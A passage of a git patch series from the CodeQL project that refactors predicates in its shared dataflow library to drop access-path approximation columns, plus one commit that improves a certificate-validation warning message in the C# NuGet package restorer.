fwdFlowThroughStep0(call, arg, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, + fwdFlowThroughStep0(call, arg, cc, state, ccc, summaryCtx, t, ap, stored, ret, innerSummaryCtx) and innerSummaryCtx = TSummaryCtxSome(p, state0, innerArgT, innerArgAp, innerArgStored) and pn1 = mkPathNode(arg, state0, cc, summaryCtx, innerArgT, innerArgAp, innerArgStored) and @@ -3186,7 +3184,7 @@ module MakeImpl Lang> { FlowState state, SummaryCtx summaryCtx, Typ t, Ap ap, TypOption stored ) { exists(DataFlowCall call, CcCall ccc, RetNodeEx ret, boolean allowsFieldFlow | - fwdFlowThroughStep1(pn1, pn2, pn3, call, cc, state, ccc, summaryCtx, t, ap, _, stored, + fwdFlowThroughStep1(pn1, pn2, pn3, call, cc, state, ccc, summaryCtx, t, ap, stored, ret) and flowThroughOutOfCall(call, ccc, ret, node, allowsFieldFlow) and not inBarrier(node, state) and From 22e0636cbad63262545f392b5f53f6ca64b74ce2 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Tue, 10 Dec 2024 13:06:29 +0100 Subject: [PATCH 0975/1267] Dataflow: Insert a few getApprox calls to remove even more columns. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 58 +++++++++---------- 1 file changed, 29 insertions(+), 29 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 6b24db3ea0c..64630390fec 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -1545,7 +1545,8 @@ module MakeImpl Lang> { apa = getApprox(ap) or // flow into a callable without summary context - fwdFlowInNoFlowThrough(node, apa, state, cc, t, ap, stored) and + fwdFlowInNoFlowThrough(node, state, cc, t, ap, stored) and + apa = getApprox(ap) and summaryCtx = TSummaryCtxNone() and // When the call contexts of source and sink needs to match then there's // never any reason to enter a callable except to find a summary. See also @@ -1553,7 +1554,8 @@ module MakeImpl Lang> { not Config::getAFeature() instanceof FeatureEqualSourceSinkCallContext or // flow into a callable with summary context (non-linear recursion) - fwdFlowInFlowThrough(node, apa, state, cc, t, ap, stored) and + fwdFlowInFlowThrough(node, state, cc, t, ap, stored) and + apa = getApprox(ap) and summaryCtx = TSummaryCtxSome(node, state, t, ap, stored) or // flow out of a callable @@ -1562,8 +1564,9 @@ module MakeImpl Lang> { or // flow through a callable exists(DataFlowCall call, CcCall ccc, RetNodeEx ret, boolean allowsFieldFlow | - fwdFlowThrough(call, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret) and + fwdFlowThrough(call, cc, state, ccc, summaryCtx, t, ap, stored, ret) and flowThroughOutOfCall(call, ccc, ret, node, allowsFieldFlow) and + apa = getApprox(ap) and not inBarrier(node, state) and if allowsFieldFlow = false then ap instanceof ApNil else any() ) @@ -1572,7 +1575,7 @@ module MakeImpl Lang> { private newtype TSummaryCtx = TSummaryCtxNone() or TSummaryCtxSome(ParamNodeEx p, FlowState state, Typ t, Ap ap, TypOption stored) { - fwdFlowInFlowThrough(p, _, state, _, t, ap, stored) + fwdFlowInFlowThrough(p, state, _, t, ap, stored) } /** @@ -1823,11 +1826,10 @@ module MakeImpl Lang> { pragma[inline] private predicate fwdFlowInCandTypeFlowDisabled( DataFlowCall call, ArgNodeEx arg, FlowState state, Cc outercc, DataFlowCallable inner, - ParamNodeEx p, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, TypOption stored, - boolean cc + ParamNodeEx p, SummaryCtx summaryCtx, Typ t, Ap ap, TypOption stored, boolean cc ) { not enableTypeFlow() and - fwdFlowInCand(call, arg, state, outercc, inner, p, summaryCtx, t, ap, _, apa, stored, cc) + fwdFlowInCand(call, arg, state, outercc, inner, p, summaryCtx, t, ap, _, _, stored, cc) } pragma[nomagic] @@ -1862,15 +1864,15 @@ module MakeImpl Lang> { predicate fwdFlowIn( DataFlowCall call, ArgNodeEx arg, DataFlowCallable inner, ParamNodeEx p, FlowState state, Cc outercc, CcCall innercc, SummaryCtx summaryCtx, Typ t, Ap ap, - ApApprox apa, TypOption stored, boolean cc + TypOption stored, boolean cc ) { // type flow disabled: linear recursion fwdFlowInCandTypeFlowDisabled(call, arg, state, outercc, inner, p, summaryCtx, t, ap, - apa, stored, cc) and + stored, cc) and fwdFlowInValidEdgeTypeFlowDisabled(call, inner, innercc, pragma[only_bind_into](cc)) or // type flow enabled: non-linear recursion - exists(boolean emptyAp | + exists(boolean emptyAp, ApApprox apa | fwdFlowIntoArg(arg, state, outercc, summaryCtx, t, ap, emptyAp, apa, stored, cc) and fwdFlowInValidEdgeTypeFlowEnabled(call, arg, outercc, inner, p, innercc, emptyAp, apa, cc) @@ -1884,10 +1886,9 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowInNoFlowThrough( - ParamNodeEx p, ApApprox apa, FlowState state, CcCall innercc, Typ t, Ap ap, - TypOption stored + ParamNodeEx p, FlowState state, CcCall innercc, Typ t, Ap ap, TypOption stored ) { - FwdFlowInNoThrough::fwdFlowIn(_, _, _, p, state, _, innercc, _, t, ap, apa, stored, _) + FwdFlowInNoThrough::fwdFlowIn(_, _, _, p, state, _, innercc, _, t, ap, stored, _) } private predicate top() { any() } @@ -1896,10 +1897,9 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowInFlowThrough( - ParamNodeEx p, ApApprox apa, FlowState state, CcCall innercc, Typ t, Ap ap, - TypOption stored + ParamNodeEx p, FlowState state, CcCall innercc, Typ t, Ap ap, TypOption stored ) { - FwdFlowInThrough::fwdFlowIn(_, _, _, p, state, _, innercc, _, t, ap, apa, stored, _) + FwdFlowInThrough::fwdFlowIn(_, _, _, p, state, _, innercc, _, t, ap, stored, _) } pragma[nomagic] @@ -1997,9 +1997,9 @@ module MakeImpl Lang> { DataFlowCall call, DataFlowCallable c, ParamNodeEx p, FlowState state, CcCall innercc, Typ t, Ap ap, TypOption stored, boolean cc ) { - FwdFlowInNoThrough::fwdFlowIn(call, _, c, p, state, _, innercc, _, t, ap, _, stored, cc) + FwdFlowInNoThrough::fwdFlowIn(call, _, c, p, state, _, innercc, _, t, ap, stored, cc) or - FwdFlowInThrough::fwdFlowIn(call, _, c, p, state, _, innercc, _, t, ap, _, stored, cc) + FwdFlowInThrough::fwdFlowIn(call, _, c, p, state, _, innercc, _, t, ap, stored, cc) } pragma[nomagic] @@ -2070,11 +2070,11 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowRetFromArg( RetNodeEx ret, FlowState state, CcCall ccc, SummaryCtxSome summaryCtx, Typ t, Ap ap, - ApApprox apa, TypOption stored + TypOption stored ) { exists(ReturnKindExt kind, ParamNodeEx p, Ap argAp | instanceofCcCall(ccc) and - fwdFlow(pragma[only_bind_into](ret), state, ccc, summaryCtx, t, ap, apa, stored) and + fwdFlow(pragma[only_bind_into](ret), state, ccc, summaryCtx, t, ap, _, stored) and summaryCtx = TSummaryCtxSome(pragma[only_bind_into](p), _, _, pragma[only_bind_into](argAp), _) and not outBarrier(ret, state) and @@ -2087,19 +2087,19 @@ module MakeImpl Lang> { pragma[inline] private predicate fwdFlowThrough0( DataFlowCall call, ArgNodeEx arg, Cc cc, FlowState state, CcCall ccc, - SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, TypOption stored, RetNodeEx ret, + SummaryCtx summaryCtx, Typ t, Ap ap, TypOption stored, RetNodeEx ret, SummaryCtxSome innerSummaryCtx ) { - fwdFlowRetFromArg(ret, state, ccc, innerSummaryCtx, t, ap, apa, stored) and + fwdFlowRetFromArg(ret, state, ccc, innerSummaryCtx, t, ap, stored) and fwdFlowIsEntered(call, arg, cc, ccc, summaryCtx, innerSummaryCtx) } pragma[nomagic] private predicate fwdFlowThrough( DataFlowCall call, Cc cc, FlowState state, CcCall ccc, SummaryCtx summaryCtx, Typ t, - Ap ap, ApApprox apa, TypOption stored, RetNodeEx ret + Ap ap, TypOption stored, RetNodeEx ret ) { - fwdFlowThrough0(call, _, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, _) + fwdFlowThrough0(call, _, cc, state, ccc, summaryCtx, t, ap, stored, ret, _) } pragma[nomagic] @@ -2107,7 +2107,7 @@ module MakeImpl Lang> { DataFlowCall call, ArgNodeEx arg, Cc cc, CcCall innerCc, SummaryCtx summaryCtx, ParamNodeEx p, FlowState state, Typ t, Ap ap, TypOption stored ) { - FwdFlowInThrough::fwdFlowIn(call, arg, _, p, state, cc, innerCc, summaryCtx, t, ap, _, + FwdFlowInThrough::fwdFlowIn(call, arg, _, p, state, cc, innerCc, summaryCtx, t, ap, stored, _) } @@ -2143,7 +2143,7 @@ module MakeImpl Lang> { DataFlowCall call, FlowState state, CcCall ccc, Ap ap, RetNodeEx ret, SummaryCtxSome innerSummaryCtx ) { - fwdFlowThrough0(call, _, _, state, ccc, _, _, ap, _, _, ret, innerSummaryCtx) + fwdFlowThrough0(call, _, _, state, ccc, _, _, ap, _, ret, innerSummaryCtx) } pragma[nomagic] @@ -3120,11 +3120,11 @@ module MakeImpl Lang> { SummaryCtx outerSummaryCtx, SummaryCtx innerSummaryCtx, Typ t, Ap ap, TypOption stored ) { FwdFlowInNoThrough::fwdFlowIn(_, arg, _, p, state, outercc, innercc, outerSummaryCtx, t, - ap, _, stored, _) and + ap, stored, _) and innerSummaryCtx = TSummaryCtxNone() or FwdFlowInThrough::fwdFlowIn(_, arg, _, p, state, outercc, innercc, outerSummaryCtx, t, - ap, _, stored, _) and + ap, stored, _) and innerSummaryCtx = TSummaryCtxSome(p, state, t, ap, stored) } @@ -3134,7 +3134,7 @@ module MakeImpl Lang> { SummaryCtx summaryCtx, Typ t, Ap ap, TypOption stored, RetNodeEx ret, SummaryCtxSome innerSummaryCtx ) { - fwdFlowThrough0(call, arg, cc, state, ccc, summaryCtx, t, ap, _, stored, ret, + fwdFlowThrough0(call, arg, cc, state, ccc, summaryCtx, t, ap, stored, ret, innerSummaryCtx) } From 501cbdab3c4e5bdbd6e417d4e5e369dfcfcb3657 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Tue, 10 Dec 2024 13:12:32 +0100 Subject: [PATCH 0976/1267] Dataflow: Remove another ApApprox join and related columns. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 27 +++++++++---------- 1 file changed, 13 insertions(+), 14 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 64630390fec..20ead18e692 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -1717,9 +1717,9 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowIntoArg( ArgNodeEx arg, FlowState state, Cc outercc, SummaryCtx summaryCtx, Typ t, Ap ap, - boolean emptyAp, ApApprox apa, TypOption stored, boolean cc + boolean emptyAp, TypOption stored, boolean cc ) { - fwdFlow(arg, state, outercc, summaryCtx, t, ap, apa, stored) and + fwdFlow(arg, state, outercc, summaryCtx, t, ap, _, stored) and (if instanceofCcCall(outercc) then cc = true else cc = false) and if ap instanceof ApNil then emptyAp = true else emptyAp = false } @@ -1809,10 +1809,10 @@ module MakeImpl Lang> { pragma[inline] private predicate fwdFlowInCand( DataFlowCall call, ArgNodeEx arg, FlowState state, Cc outercc, DataFlowCallable inner, - ParamNodeEx p, SummaryCtx summaryCtx, Typ t, Ap ap, boolean emptyAp, ApApprox apa, - TypOption stored, boolean cc + ParamNodeEx p, SummaryCtx summaryCtx, Typ t, Ap ap, boolean emptyAp, TypOption stored, + boolean cc ) { - fwdFlowIntoArg(arg, state, outercc, summaryCtx, t, ap, emptyAp, apa, stored, cc) and + fwdFlowIntoArg(arg, state, outercc, summaryCtx, t, ap, emptyAp, stored, cc) and ( inner = viableImplCallContextReducedInlineLate(call, arg, outercc) or @@ -1829,16 +1829,16 @@ module MakeImpl Lang> { ParamNodeEx p, SummaryCtx summaryCtx, Typ t, Ap ap, TypOption stored, boolean cc ) { not enableTypeFlow() and - fwdFlowInCand(call, arg, state, outercc, inner, p, summaryCtx, t, ap, _, _, stored, cc) + fwdFlowInCand(call, arg, state, outercc, inner, p, summaryCtx, t, ap, _, stored, cc) } pragma[nomagic] private predicate fwdFlowInCandTypeFlowEnabled( DataFlowCall call, ArgNodeEx arg, Cc outercc, DataFlowCallable inner, ParamNodeEx p, - boolean emptyAp, ApApprox apa, boolean cc + boolean emptyAp, boolean cc ) { enableTypeFlow() and - fwdFlowInCand(call, arg, _, outercc, inner, p, _, _, _, emptyAp, apa, _, cc) + fwdFlowInCand(call, arg, _, outercc, inner, p, _, _, _, emptyAp, _, cc) } pragma[nomagic] @@ -1853,9 +1853,9 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowInValidEdgeTypeFlowEnabled( DataFlowCall call, ArgNodeEx arg, Cc outercc, DataFlowCallable inner, ParamNodeEx p, - CcCall innercc, boolean emptyAp, ApApprox apa, boolean cc + CcCall innercc, boolean emptyAp, boolean cc ) { - fwdFlowInCandTypeFlowEnabled(call, arg, outercc, inner, p, emptyAp, apa, cc) and + fwdFlowInCandTypeFlowEnabled(call, arg, outercc, inner, p, emptyAp, cc) and FwdTypeFlow::typeFlowValidEdgeIn(call, inner, cc) and innercc = getCallContextCall(call, inner) } @@ -1872,10 +1872,9 @@ module MakeImpl Lang> { fwdFlowInValidEdgeTypeFlowDisabled(call, inner, innercc, pragma[only_bind_into](cc)) or // type flow enabled: non-linear recursion - exists(boolean emptyAp, ApApprox apa | - fwdFlowIntoArg(arg, state, outercc, summaryCtx, t, ap, emptyAp, apa, stored, cc) and - fwdFlowInValidEdgeTypeFlowEnabled(call, arg, outercc, inner, p, innercc, emptyAp, apa, - cc) + exists(boolean emptyAp | + fwdFlowIntoArg(arg, state, outercc, summaryCtx, t, ap, emptyAp, stored, cc) and + fwdFlowInValidEdgeTypeFlowEnabled(call, arg, outercc, inner, p, innercc, emptyAp, cc) ) } } From 684c80c31a1fd828b9f1fc16225b9c21a828934e Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Tue, 10 Dec 2024 13:13:11 +0100 Subject: [PATCH 0977/1267] C#: Address review comments. --- .../NugetPackageRestorer.cs | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs index 17547a0ec87..393e37579b7 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs @@ -606,7 +606,12 @@ namespace Semmle.Extraction.CSharp.DependencyFetching { if (chain is null || cert is null) { - logger.LogWarning("Certificate validation trivially failed due to missing chain or certificate."); + var msg = cert is null && chain is null + ? "certificate and chain" + : chain is null + ? "chain" + : "certificate"; + logger.LogWarning($"Dependabot proxy certificate validation failed due to missing {msg}"); return false; } chain.ChainPolicy.TrustMode = X509ChainTrustMode.CustomRootTrust; From 231bf9d1c9e0fdf0c30300112501fe8a882a5591 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Tue, 10 Dec 2024 13:20:27 +0100 Subject: [PATCH 0978/1267] Dataflow: Drop ApApprox join in fwdFlowStore. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 31 +++++++++---------- 1 file changed, 14 insertions(+), 17 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 20ead18e692..426c6200e90 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -877,13 +877,11 @@ module MakeImpl Lang> { pragma[nomagic] predicate storeStepCand( - NodeEx node1, Ap ap1, Content c, NodeEx node2, DataFlowType contentType, - DataFlowType containerType + NodeEx node1, Content c, NodeEx node2, DataFlowType contentType, DataFlowType containerType ) { revFlowIsReadAndStored(c) and revFlow(node2) and - store(node1, c, node2, contentType, containerType) and - exists(ap1) + store(node1, c, node2, contentType, containerType) } pragma[nomagic] @@ -1292,8 +1290,7 @@ module MakeImpl Lang> { predicate returnMayFlowThrough(RetNodeEx ret, ReturnKindExt kind); predicate storeStepCand( - NodeEx node1, Ap ap1, Content c, NodeEx node2, DataFlowType contentType, - DataFlowType containerType + NodeEx node1, Content c, NodeEx node2, DataFlowType contentType, DataFlowType containerType ); predicate readStepCand(NodeEx n1, Content c, NodeEx n2); @@ -1451,7 +1448,7 @@ module MakeImpl Lang> { pragma[nomagic] private predicate compatibleContainer0(ApHeadContent apc, DataFlowType containerType) { exists(DataFlowType containerType0, Content c | - PrevStage::storeStepCand(_, _, c, _, _, containerType0) and + PrevStage::storeStepCand(_, c, _, _, containerType0) and not isTopType(containerType0) and compatibleTypesCached(containerType0, containerType) and apc = projectToHeadContent(c) @@ -1461,7 +1458,7 @@ module MakeImpl Lang> { pragma[nomagic] private predicate topTypeContent(ApHeadContent apc) { exists(DataFlowType containerType0, Content c | - PrevStage::storeStepCand(_, _, c, _, _, containerType0) and + PrevStage::storeStepCand(_, c, _, _, containerType0) and isTopType(containerType0) and apc = projectToHeadContent(c) ) @@ -1646,11 +1643,11 @@ module MakeImpl Lang> { NodeEx node1, Typ t1, Ap ap1, TypOption stored1, Content c, Typ t2, TypOption stored2, NodeEx node2, FlowState state, Cc cc, SummaryCtx summaryCtx ) { - exists(DataFlowType contentType, DataFlowType containerType, ApApprox apa1 | - fwdFlow(node1, state, cc, summaryCtx, t1, ap1, apa1, stored1) and + exists(DataFlowType contentType, DataFlowType containerType | + fwdFlow(node1, state, cc, summaryCtx, t1, ap1, _, stored1) and not outBarrier(node1, state) and not inBarrier(node2, state) and - PrevStage::storeStepCand(node1, apa1, c, node2, contentType, containerType) and + PrevStage::storeStepCand(node1, c, node2, contentType, containerType) and t2 = getTyp(containerType) and // We need to typecheck stores here, since reverse flow through a getter // might have a different type here compared to inside the getter. @@ -2443,11 +2440,11 @@ module MakeImpl Lang> { pragma[nomagic] predicate storeStepCand( - NodeEx node1, Ap ap1, Content c, NodeEx node2, DataFlowType contentType, + NodeEx node1, Content c, NodeEx node2, DataFlowType contentType, DataFlowType containerType ) { - exists(Ap ap2 | - PrevStage::storeStepCand(node1, _, c, node2, contentType, containerType) and + exists(Ap ap2, Ap ap1 | + PrevStage::storeStepCand(node1, c, node2, contentType, containerType) and revFlowStore(ap2, c, ap1, node1, _, node2, _, _) and revFlowConsCand(ap2, c, ap1) ) @@ -2664,7 +2661,7 @@ module MakeImpl Lang> { or node instanceof OutNodeEx or - storeStepCand(_, _, _, node, _, _) + storeStepCand(_, _, node, _, _) or readStepCand(_, _, node) or @@ -2698,7 +2695,7 @@ module MakeImpl Lang> { callEdgeReturn(_, _, node, _, next, _) and apNext = ap or - storeStepCand(node, _, _, next, _, _) + storeStepCand(node, _, next, _, _) or readStepCand(node, _, next) ) @@ -3950,7 +3947,7 @@ module MakeImpl Lang> { PrevStage::readStepCand(_, pragma[only_bind_into](c), _) and c = cs.getAReadContent() and clearSet(node, cs) and - if PrevStage::storeStepCand(_, _, _, node, _, _) + if PrevStage::storeStepCand(_, _, node, _, _) then isStoreTarget = true else isStoreTarget = false ) From 4e155f8542c4dcfb4216d078c34e6f69fabd52f5 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Tue, 10 Dec 2024 13:23:51 +0100 Subject: [PATCH 0979/1267] Dataflow: Insert a few getApprox calls to remove ApApprox from fwdFlow. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 85 ++++++++++--------- 1 file changed, 43 insertions(+), 42 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 426c6200e90..56bf5530704 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -1479,26 +1479,27 @@ module MakeImpl Lang> { */ pragma[nomagic] additional predicate fwdFlow( - NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, - TypOption stored + NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap, TypOption stored ) { - fwdFlow1(node, state, cc, summaryCtx, _, t, ap, apa, stored) + fwdFlow1(node, state, cc, summaryCtx, _, t, ap, stored) } private predicate fwdFlow1( NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t0, Typ t, Ap ap, - ApApprox apa, TypOption stored + TypOption stored ) { - fwdFlow0(node, state, cc, summaryCtx, t0, ap, apa, stored) and - PrevStage::revFlow(node, state, apa) and - filter(node, state, t0, ap, t) and - ( - if node instanceof CastingNodeEx - then - ap instanceof ApNil or - compatibleContainer(getHeadContent(ap), node.getDataFlowType()) or - topTypeContent(getHeadContent(ap)) - else any() + exists(ApApprox apa | + fwdFlow0(node, state, cc, summaryCtx, t0, ap, apa, stored) and + PrevStage::revFlow(node, state, apa) and + filter(node, state, t0, ap, t) and + ( + if node instanceof CastingNodeEx + then + ap instanceof ApNil or + compatibleContainer(getHeadContent(ap), node.getDataFlowType()) or + topTypeContent(getHeadContent(ap)) + else any() + ) ) } @@ -1516,7 +1517,8 @@ module MakeImpl Lang> { stored.isNone() or exists(NodeEx mid, FlowState state0, Typ t0, LocalCc localCc | - fwdFlow(mid, state0, cc, summaryCtx, t0, ap, apa, stored) and + fwdFlow(mid, state0, cc, summaryCtx, t0, ap, stored) and + apa = getApprox(ap) and localCc = getLocalCc(cc) | localStep(mid, state0, node, state, true, _, localCc, _) and @@ -1526,7 +1528,8 @@ module MakeImpl Lang> { ap instanceof ApNil ) or - fwdFlowJump(node, state, t, ap, apa, stored) and + fwdFlowJump(node, state, t, ap, stored) and + apa = getApprox(ap) and cc = ccNone() and summaryCtx = TSummaryCtxNone() or @@ -1615,23 +1618,21 @@ module MakeImpl Lang> { override Location getLocation() { result = p.getLocation() } } - private predicate fwdFlowJump( - NodeEx node, FlowState state, Typ t, Ap ap, ApApprox apa, TypOption stored - ) { + private predicate fwdFlowJump(NodeEx node, FlowState state, Typ t, Ap ap, TypOption stored) { exists(NodeEx mid | - fwdFlow(mid, state, _, _, t, ap, apa, stored) and + fwdFlow(mid, state, _, _, t, ap, stored) and jumpStepEx(mid, node) ) or exists(NodeEx mid | - fwdFlow(mid, state, _, _, _, ap, apa, stored) and + fwdFlow(mid, state, _, _, _, ap, stored) and additionalJumpStep(mid, node, _) and t = getNodeTyp(node) and ap instanceof ApNil ) or exists(NodeEx mid, FlowState state0 | - fwdFlow(mid, state0, _, _, _, ap, apa, stored) and + fwdFlow(mid, state0, _, _, _, ap, stored) and additionalJumpStateStep(mid, state0, node, state, _) and t = getNodeTyp(node) and ap instanceof ApNil @@ -1644,7 +1645,7 @@ module MakeImpl Lang> { NodeEx node2, FlowState state, Cc cc, SummaryCtx summaryCtx ) { exists(DataFlowType contentType, DataFlowType containerType | - fwdFlow(node1, state, cc, summaryCtx, t1, ap1, _, stored1) and + fwdFlow(node1, state, cc, summaryCtx, t1, ap1, stored1) and not outBarrier(node1, state) and not inBarrier(node2, state) and PrevStage::storeStepCand(node1, c, node2, contentType, containerType) and @@ -1685,7 +1686,7 @@ module MakeImpl Lang> { Cc cc, SummaryCtx summaryCtx ) { exists(ApHeadContent apc | - fwdFlow(node1, state, cc, summaryCtx, t, ap, _, stored) and + fwdFlow(node1, state, cc, summaryCtx, t, ap, stored) and not outBarrier(node1, state) and not inBarrier(node2, state) and apc = getHeadContent(ap) and @@ -1716,7 +1717,7 @@ module MakeImpl Lang> { ArgNodeEx arg, FlowState state, Cc outercc, SummaryCtx summaryCtx, Typ t, Ap ap, boolean emptyAp, TypOption stored, boolean cc ) { - fwdFlow(arg, state, outercc, summaryCtx, t, ap, _, stored) and + fwdFlow(arg, state, outercc, summaryCtx, t, ap, stored) and (if instanceofCcCall(outercc) then cc = true else cc = false) and if ap instanceof ApNil then emptyAp = true else emptyAp = false } @@ -1940,7 +1941,7 @@ module MakeImpl Lang> { ) { instanceofCcNoCall(cc) and not outBarrier(ret, state) and - fwdFlow(ret, state, cc, summaryCtx, t, ap, _, stored) + fwdFlow(ret, state, cc, summaryCtx, t, ap, stored) } pragma[nomagic] @@ -2003,7 +2004,7 @@ module MakeImpl Lang> { ParamNodeEx p, FlowState state, CcCall cc, Typ t0, Ap ap, TypOption stored ) { instanceofCcCall(cc) and - fwdFlow1(p, state, cc, _, t0, _, ap, _, stored) + fwdFlow1(p, state, cc, _, t0, _, ap, stored) } pragma[nomagic] @@ -2026,7 +2027,7 @@ module MakeImpl Lang> { private predicate fwdFlow1Out( NodeEx node, FlowState state, Cc cc, Typ t0, Ap ap, TypOption stored ) { - fwdFlow1(node, state, cc, _, t0, _, ap, _, stored) and + fwdFlow1(node, state, cc, _, t0, _, ap, stored) and PrevStage::callEdgeReturn(_, _, _, _, node, _) } @@ -2048,7 +2049,7 @@ module MakeImpl Lang> { or exists(NodeEx node | cc = false and - fwdFlowJump(node, _, _, _, _, _) and + fwdFlowJump(node, _, _, _, _) and c = node.getEnclosingCallable() ) } @@ -2070,7 +2071,7 @@ module MakeImpl Lang> { ) { exists(ReturnKindExt kind, ParamNodeEx p, Ap argAp | instanceofCcCall(ccc) and - fwdFlow(pragma[only_bind_into](ret), state, ccc, summaryCtx, t, ap, _, stored) and + fwdFlow(pragma[only_bind_into](ret), state, ccc, summaryCtx, t, ap, stored) and summaryCtx = TSummaryCtxSome(pragma[only_bind_into](p), _, _, pragma[only_bind_into](argAp), _) and not outBarrier(ret, state) and @@ -2164,7 +2165,7 @@ module MakeImpl Lang> { returnFlowsThrough(_, _, _, _, pragma[only_bind_into](p), pragma[only_bind_into](argT), pragma[only_bind_into](argAp), pragma[only_bind_into](argStored), ap) and flowIntoCallApaTaken(call, _, pragma[only_bind_into](arg), p, emptyArgAp) and - fwdFlow(arg, _, _, _, pragma[only_bind_into](argT), pragma[only_bind_into](argAp), _, + fwdFlow(arg, _, _, _, pragma[only_bind_into](argT), pragma[only_bind_into](argAp), pragma[only_bind_into](argStored)) and if argAp instanceof ApNil then emptyArgAp = true else emptyArgAp = false ) @@ -2176,7 +2177,7 @@ module MakeImpl Lang> { ) { exists(boolean emptyAp | flowIntoCallApaTaken(call, c, arg, p, emptyAp) and - fwdFlow(arg, _, _, _, _, ap, _, _) and + fwdFlow(arg, _, _, _, _, ap, _) and if ap instanceof ApNil then emptyAp = true else emptyAp = false ) } @@ -2187,7 +2188,7 @@ module MakeImpl Lang> { Ap ap, boolean allowsFieldFlow ) { PrevStage::callEdgeReturn(call, c, ret, _, out, allowsFieldFlow) and - fwdFlow(ret, _, _, _, _, ap, _, _) and + fwdFlow(ret, _, _, _, _, ap, _) and pos = ret.getReturnPosition() and (if allowsFieldFlow = false then ap instanceof ApNil else any()) and ( @@ -2210,14 +2211,14 @@ module MakeImpl Lang> { NodeEx node, FlowState state, ReturnCtx returnCtx, ApOption returnAp, Ap ap ) { revFlow0(node, state, returnCtx, returnAp, ap) and - fwdFlow(node, state, _, _, _, ap, _, _) + fwdFlow(node, state, _, _, _, ap, _) } pragma[nomagic] private predicate revFlow0( NodeEx node, FlowState state, ReturnCtx returnCtx, ApOption returnAp, Ap ap ) { - fwdFlow(node, state, _, _, _, ap, _, _) and + fwdFlow(node, state, _, _, _, ap, _) and sinkNode(node, state) and ( if hasSinkCallCtx() @@ -2345,7 +2346,7 @@ module MakeImpl Lang> { predicate dataFlowNonCallEntry(DataFlowCallable c, boolean cc) { exists(NodeEx node, FlowState state, ApNil nil | - fwdFlow(node, state, _, _, _, nil, _, _) and + fwdFlow(node, state, _, _, _, nil, _) and sinkNode(node, state) and (if hasSinkCallCtx() then cc = true else cc = false) and c = node.getEnclosingCallable() @@ -2520,7 +2521,7 @@ module MakeImpl Lang> { exists(Ap ap0 | parameterMayFlowThrough(p, _) and revFlow(n, state, TReturnCtxMaybeFlowThrough(_), _, ap0) and - fwdFlow(n, state, any(CcCall ccc), TSummaryCtxSome(p, _, _, ap, _), _, ap0, _, _) + fwdFlow(n, state, any(CcCall ccc), TSummaryCtxSome(p, _, _, ap, _), _, ap0, _) ) } @@ -2812,7 +2813,7 @@ module MakeImpl Lang> { NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap, TypOption stored ) { - fwdFlow(node, state, cc, summaryCtx, t, ap, _, stored) and + fwdFlow(node, state, cc, summaryCtx, t, ap, stored) and revFlow(node, state, _, _, ap) } or TPathNodeSink(NodeEx node, FlowState state) { @@ -3148,7 +3149,7 @@ module MakeImpl Lang> { TypOption stored ) { exists(Typ t | - fwdFlow1(node, state, cc, summaryCtx, t0, t, ap, _, stored) and + fwdFlow1(node, state, cc, summaryCtx, t0, t, ap, stored) and result = TPathNodeMid(node, state, cc, summaryCtx, t, ap, stored) ) } @@ -3598,13 +3599,13 @@ module MakeImpl Lang> { int tfnodes, int tftuples ) { fwd = true and - nodes = count(NodeEx node | fwdFlow(node, _, _, _, _, _, _, _)) and + nodes = count(NodeEx node | fwdFlow(node, _, _, _, _, _, _)) and fields = count(Content f0 | fwdConsCand(f0, _)) and conscand = count(Content f0, Ap ap | fwdConsCand(f0, ap)) and - states = count(FlowState state | fwdFlow(_, state, _, _, _, _, _, _)) and + states = 